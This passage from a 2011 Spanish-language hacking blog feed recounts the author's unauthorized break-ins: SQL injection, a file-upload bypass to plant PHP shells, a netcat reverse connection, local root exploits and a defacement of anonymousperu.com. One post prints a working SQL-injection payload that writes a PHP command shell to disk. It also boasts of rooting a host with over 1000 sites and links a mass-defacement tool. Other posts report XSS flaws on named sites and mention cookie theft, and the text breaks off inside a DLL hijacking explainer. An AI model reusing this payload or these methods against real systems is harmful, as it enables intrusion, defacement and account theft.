dentro de alguna de esas webs publicadas por ellos estaba http://anonymousperu.com entonces dije OMG tienen su propio dominio ahora si vamos a ver que tan buenos son... entonces les hago unos scaneos simples no, me doy cuenta que estan en un hosting no en vps le tiro Reverse DNS&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://i44.tinypic.com/53siuf.png"&gt;&lt;img src="http://i44.tinypic.com/53siuf.png" width="450" height="350" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Busco hasta encontrar esto...&lt;br /&gt;&lt;br /&gt;http://www.cnblacklist.com/single.php?post_ID='&lt;br /&gt;&lt;br /&gt;&lt;a href="http://i39.tinypic.com/2nlzhh3.png"&gt;&lt;img src="http://i39.tinypic.com/2nlzhh3.png" width="450" height="350" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Entonces comienzo a inyectar intentado sacar user y pass y me banean la IP U_U y me comenzaron a banear cada vez que inyectaba, mi amigo de ecuador A.A me ayuda se loguea en http://www.cnblacklist.com/admin/login.php y hay un upload donde se pueden subir supuestamente archivos ".jpg" pero bypasseando se subio un .php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;URL: http://cnblacklist.com//uploads/201111/xd.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Me Fui a otro dir y subi una shell que me acomoda mas...&lt;br /&gt;&lt;br /&gt;http://cnblacklist.com/tr0ll.jpg.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hice mi Conexion inversa con el NetCat...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Version: 2.6.32-71.29.1.el6.x86_64&lt;br /&gt;&lt;br /&gt;Local Root Expl0it: Si.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Me pongo como root navego rápidamente por los direcorio que habian en /home/ hasta que encuentro... uno que tiene el dir:&lt;br /&gt;&lt;br /&gt;/lightIRC/ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;dije este es... estoy subiendo un archivo de Owned y se me desconecta el Netcat...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Las shells no estaban... y yo Dije Hijo de pu... el site del chino tampoco entraba...&lt;br /&gt;&lt;br /&gt;http://cnblacklist.com/&lt;br /&gt;&lt;br /&gt;Error 403... OMG que paso entre en desesperacion... me quería morir comenzé a poner estatus de odio a los chinos, tweets y mas cosas xD entonces... me llego este mail...&lt;br /&gt;&lt;br /&gt;Hola, &lt;br /&gt;&lt;br /&gt;Has publicado un mensaje en el muro que infringe nuestras Condiciones de uso. Entre otras cosas, los comentarios ofensivos, amenazantes u obscenos no están permitidos. También retiramos los que atacan a individuos o grupos de personas concretos, o que anuncian un producto o servicio. El mal uso continuado de las funciones de Facebook puede provocar la inhabilitación de tu cuenta. Si tienes preguntas, visita la siguiente página de preguntas frecuentes: &lt;br /&gt;&lt;br /&gt;El equipo de Facebook&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;xD me calmé... y de pronto dije a ver si se subio...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;www.anonymousperu.com/pwned.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si se subio...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://i43.tinypic.com/1to8t1.png"&gt;&lt;img src="http://i43.tinypic.com/1to8t1.png" width="450" height="350" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anonymous Perú Pwned... El Archivo despues de como 5 minutos comenzó a ir a http://redirect.main-hosting.com/error404.php/2&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos Anonymous Yo no los perdono por dejar tan mal la seguridad informática peruana.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;gr33tz: &lt;b&gt;SDM&lt;/b&gt;, AA, Wirito, 45p1d4_16n15, Ar3sw0rmed, Real Peruvian Elite And Peruvian Cyber Security.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mision Cumplida.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5488436891127171983?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/5488436891127171983/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5488436891127171983&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5488436891127171983?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5488436891127171983?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/pwned-anonymousperucom.html" title="Pwned AnonymousPeru.com" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i44.tinypic.com/53siuf_th.png" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;DU8DQHc9cCp7ImA9WhRSFkg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-8261153935854906242</id><published>2011-11-18T15:08:00.000-08:00</published><updated>2011-11-18T15:11:11.968-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T15:11:11.968-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><title>Archive.Org Xssed</title><content type="html">Bueno estaba recordando mis viejos tiempos cuando tenia unos sites de cosas relacionadas a niñadas y entonces dije nah no creo que sean vulns a Xss entonces me perdi buscando hasta que encontré, el bug lo encontre ya hace buen tiempo hoy me atrevo a hacer el video :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/32344805?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="183" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-8261153935854906242?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/8261153935854906242/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=8261153935854906242&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8261153935854906242?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/8261153935854906242?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/archiveorg-xssed.html" title="Archive.Org Xssed" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DUAHQnY6fip7ImA9WhRSFkg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4108609027428788826</id><published>2011-11-18T15:03:00.000-08:00</published><updated>2011-11-18T15:08:53.816-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-18T15:08:53.816-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="xsrf" /><title>MercadoLibre Argentina Xssed</title><content type="html">Bueno vi su ad y dije usaran adsense en algun momento entonces me puse a fijar hasta que llegué a... luego no pude hacer saltar el alert le dije a DarkStone...&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/32344483?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Web: http://smartad.mercadolibre.com.ar/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Reportado: no se como reportar ahi U_U&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4108609027428788826?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/4108609027428788826/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4108609027428788826&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4108609027428788826?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4108609027428788826?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/mercadolibre-argentina-xssed.html" title="MercadoLibre Argentina Xssed" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;AkABSH85fCp7ImA9WhRSFU4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-295469972721641398</id><published>2011-11-17T06:01:00.000-08:00</published><updated>2011-11-17T06:05:59.124-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-17T06:05:59.124-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><title>SonyEricsson Xssed</title><content type="html">No es que sea un fanatico del Xss U_U se puede puede robar las cookies de developers ya hice la prueba...&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/32114629?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-295469972721641398?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/295469972721641398/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=295469972721641398&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/295469972721641398?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/295469972721641398?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/sonyericsson-xssed.html" title="SonyEricsson Xssed" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;D0cGRng4cSp7ImA9WhRTGUk.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5427773527820817443</id><published>2011-11-10T08:23:00.000-08:00</published><updated>2011-11-10T09:10:27.639-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-10T09:10:27.639-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="yahoo" /><category scheme="http://www.blogger.com/atom/ns#" term="xsrf" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><title>Yahoo Xssed</title><content type="html">A ver el Xss se encuentra en el archivo SWF que usan para conectarse al chat de yahoo no esta en el dominio.com se encuentra en yimg.com como decir fbcdn.net en facebook, bueno en realidad si lo veo critico por que en mi caso se encuentra como un OnClick pero sin embargo puedo hacer un Onmouseover y la cosa cambia :) o fingir una descarga de un addon para usar el chat, etc, etc, etc.&lt;br /&gt;&lt;br /&gt;El Bug originalmente fue encontrado por "AA" pero solo se podia en IE yo lo hice funcionar en FF y Chrome.&lt;br /&gt;&lt;br /&gt;Video:&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/31910656?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="195" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5427773527820817443?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/5427773527820817443/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5427773527820817443&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5427773527820817443?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5427773527820817443?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/yahoo-xssed.html" title="Yahoo Xssed" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CUUGSH09eyp7ImA9WhRTFkQ.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-5068270688914370550</id><published>2011-11-07T11:02:00.001-08:00</published><updated>2011-11-07T11:13:49.363-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-07T11:13:49.363-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Eventos de Interes..." /><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><title>Bypassing Xss Filters By Camilo Galdos A.k.A Dr.White</title><content type="html">&lt;div style="width:425px" id="__ss_10061078"&gt; &lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/Dedalo-SB/lima-hack-2011" title="Lima hack 2011" target="_blank"&gt;Lima hack 2011&lt;/a&gt;&lt;/strong&gt; &lt;object id="__sse10061078" width="425" height="355"&gt; &lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=limahack2011-111107130559-phpapp01&amp;stripped_title=lima-hack-2011&amp;userName=Dedalo-SB" /&gt; &lt;param name="allowFullScreen" value="true"/&gt; &lt;param name="allowScriptAccess" value="always"/&gt; &lt;embed name="__sse10061078" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=limahack2011-111107130559-phpapp01&amp;stripped_title=lima-hack-2011&amp;userName=Dedalo-SB" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt; &lt;/object&gt; &lt;div style="padding:5px 0 12px"&gt; View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;presentations&lt;/a&gt; from &lt;a href="http://www.slideshare.net/Dedalo-SB" target="_blank"&gt;Dedalo-SB&lt;/a&gt; &lt;/div&gt; &lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/29742632?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/29742632"&gt;LimaHack 2011 Camilo&lt;/a&gt; from &lt;a href="http://vimeo.com/user8706773"&gt;Camilo Security&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/30386714?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/30386714"&gt;LimaHack 2011 III Camilo&lt;/a&gt; from &lt;a href="http://vimeo.com/user8706773"&gt;Camilo Security&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-5068270688914370550?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/5068270688914370550/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=5068270688914370550&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5068270688914370550?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/5068270688914370550?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/11/bypassing-xss-filters-by-camilo-galdos.html" title="Bypassing Xss Filters By Camilo Galdos A.k.A Dr.White" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;CEMHQ3o7fyp7ImA9WhdaEkQ.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-3458737144820788548</id><published>2011-10-22T06:21:00.000-07:00</published><updated>2011-10-22T07:07:12.407-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-22T07:07:12.407-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><category scheme="http://www.blogger.com/atom/ns#" term="root" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Root +1000 Sites (Anécdota + Tuto)</title><content type="html">Estaba recordando mis épocas de niño cuando jugaba &lt;a href="http://habbo.es"&gt;habbohotel&lt;/a&gt; y bueno dije voy a buscar una de esas copias que ahora les llaman holo, resulta que entre a un sitio y tenia un sistema de saber cuando un habbo estaba online y salia en verdesito comenze a analizar y vi que el sistema de online se hacia con dos variables:&lt;br /&gt;&lt;br /&gt;http://holosdeexample.com/estado.php?holo=123&amp;port=1232&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hasta ahora habia provado sus variables y ninguna bugged y dije a ver el ultimo intento y cuando pongo una comilla despues del port=1232...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WARNING!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tenia Sql Injection comenze a inyectar y a estas alturas sufro de pereza al inyectar todo a mano pero era una base de datos media grandesita y fue tentador despues de unas cuantas comas llegue al numero de tablas from schema bla bla bla y me doy con la sorpresa de que ningun usuario tiene privilegios... de admin ni mod ni nada parecido tenian un foro y un wordpress entonces dije voy a intentar saltar a las tablas de wordpress y smf y nada de nada y ahi si me entro la colera y un usuario del sistema su clave en md5 estaba cuando la puse en google entre comenze a buscar bugs a nivel de panel y me encontre con un lfi pero parece que tenia un filtro la variable por que jalaba imagenes y cuando intentaba jalar un .php no me dejaba entonces ya arto y sin ganas de seguir dije OMG y si intento loadfile y into outfile y entonces doy con que si se podia escribi una linda shell subi ya tenia mi shell :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://holosdeexample.com/estado.php?holo=123&amp;port=-1232+UNION+SELECT+0,1,2,3,4,'&lt;?php system($_GET["c"]); ?&gt;' INTO OUTFILE '/htdocs/www/holos/logholo.php',6,7,8,9+FROM+users+--+&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sin restriccion alguna con todas las comodidades en la inyeccion como pueden ver... el server totalmente mal configurado me permitio hacer un wget sin problemas luego ya estaba cerca a todo, hice mi reverse connect para ver todo mas de cerca desde mi PC y de pronto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El server tenia mas de 1000 webs hosteadas dentro cuando lo vi no lo podia creer la emocion crecio mas en mis ganas de poder rootear entonces vi la version que salia en mi shell y vi 2.6.18.... y era del 2009 una busqueda rápida de google nisiquiera tube que preguntarle a mis amigos juackerosos si tenian root exploit fue simple la busqueda en google: Local Root Exploit 2.6.18 2009 y di con el&lt;a href="http://www.exploit-db.com/exploits/10613/"&gt;exploit&lt;/a&gt; compilarlo y ejecutarlo... mas me tarde en buscar un bug en la web que nada si hubiese sido un black hat hubiese podido hacer mas de 1000 defaces en 5 minutos hay tool que hacen esto nunca las he provado pero aqui tienen &lt;a href="http://www.governmentsecurity.org/forum/topic/268-d86deface-mass-defacement-tool/"&gt;una&lt;/a&gt; como ejemplo, sino ustedes pueden hacer las suyas si quiren no pero yo no soy defacer asi que una vez que entre me senti la persona mas realizada del mundo xD la verdad que es la primera vez que rooteaba un server tan grande... por eso puse el post por la emocion que he sentido xD no rebelo ningun nombre para evitar problemas pero el hosting es masomenos conocido a nivel de españa asi que ya ven ustedes si lo quieren encontrar ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;no tengo capturas de pantalla por que el ataque lo hice ya hace como dos o tres semanas, la lista de sitios se los pase a algunos de mi msn asi que saben que sites son :) si me tienen en msn la pueden pedir normal, no tome captura en ningun momento y ya no tengo root asi que la historia queda para aquellos que crean ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-3458737144820788548?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/3458737144820788548/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=3458737144820788548&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3458737144820788548?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/3458737144820788548?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/10/root-1000-sites-anecdota-tuto.html" title="Root +1000 Sites (Anécdota + Tuto)" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;AkIERn49cCp7ImA9WhdbE0k.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2195284970717528043</id><published>2011-10-11T08:42:00.000-07:00</published><updated>2011-10-11T08:55:07.068-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-11T08:55:07.068-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Eventos de Interes..." /><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridad blanca" /><title>Dr.White En El LimaHack!</title><content type="html">&lt;center&gt;&lt;img src="http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s320/limahack2011.jpg" /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Mande un paper sobre como bypassear filtros de Xss y fui aceptado, en la exposicion enseñaré como funcionan los xss, como parchar los xss, como robar cuentas por medio de Xss, como es la diferencia entre un xss normal y uno persistente y mucho mas.&lt;br /&gt;&lt;br /&gt;En la exposicion también sacaré a la luz xss en webs con millones de visitas diarias a las cuales se les podría redireccionar o robar las cookies, entre esas webs el visitadisimo Facebook.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero que todos puedan ir a la Charla en el &lt;a href="http://www.limahack.com"&gt;Limahack&lt;/a&gt; el Registro me parece que aun no está abierto pero si lo estará dentro de unas horas o dias.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Para ver las exposiciones y expositores, El Programa del LimaHack en General Consulten Este &lt;a href="http://limahack.com/index.aspx?pagina=programa.aspx" Onclick="alert('Bypassing Xss Filters en el Aula Steve Jobs');"&gt;Link&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nos Vemos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2195284970717528043?l=seguridadblanca.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://seguridadblanca.blogspot.com/feeds/2195284970717528043/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2195284970717528043&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2195284970717528043?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2195284970717528043?v=2" /><link rel="alternate" type="text/html" href="http://seguridadblanca.blogspot.com/2011/10/drwhite-en-el-limahack.html" title="Dr.White En El LimaHack!" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/12768423170541748443</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-fZREhbOB7fY/TnDcigl9ubI/AAAAAAAAASo/G0aFyPYcfrY/s72-c/limahack2011.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CUENRn06fSp7ImA9WhdbEUo.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-9026117715895518823</id><published>2011-10-09T07:51:00.000-07:00</published><updated>2011-10-09T08:21:37.315-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-09T08:21:37.315-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="dll" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><category scheme="http://www.blogger.com/atom/ns#" term="hijacking" /><title>DLL Hijacking (Simple Explain)</title><content type="html">Estaba buscando la manera de entrar a la PC de una persona y no encontraba como y recordaba que habia una cosa con los DLLs y dije mmm buscare y encontre lo que se conocia como &lt;b&gt;dll hijacking&lt;/b&gt; la verdad no me servia mucho si no tengo acceso a la otra pc pero si me parecio muy interesante si lo usamos de manera creativa...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En que consiste?&lt;br /&gt;&lt;br /&gt;- Sustituir los dll de una aplicacion por otro con el mismo nombre y si la aplicacion los llama con &lt;a href="http://msdn.microsoft.com/en-us/library/ms684175%28VS.85%29.aspx"&gt;LoadLibrary&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Bueno basicamente funciona de esta manera:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Programa: Dedalo Inyecter V1.0&lt;br /&gt;&lt;br /&gt;Type: .exe&lt;br /&gt;&lt;br /&gt;Dlls: ded.dll friki.dll god.dll socket.dll&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Mi programa lo instalo y esta en:&lt;br /&gt;&lt;br /&gt;c:\hacking\soymuyjuackeroso\tools\inyector\dedaloinyecter\&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;cuando instale mi programa los dlls todo se guardaron en el system32 y en las carpetas dll del winbugs...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora vamos a aplicar este ataque...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;como sabemos programar 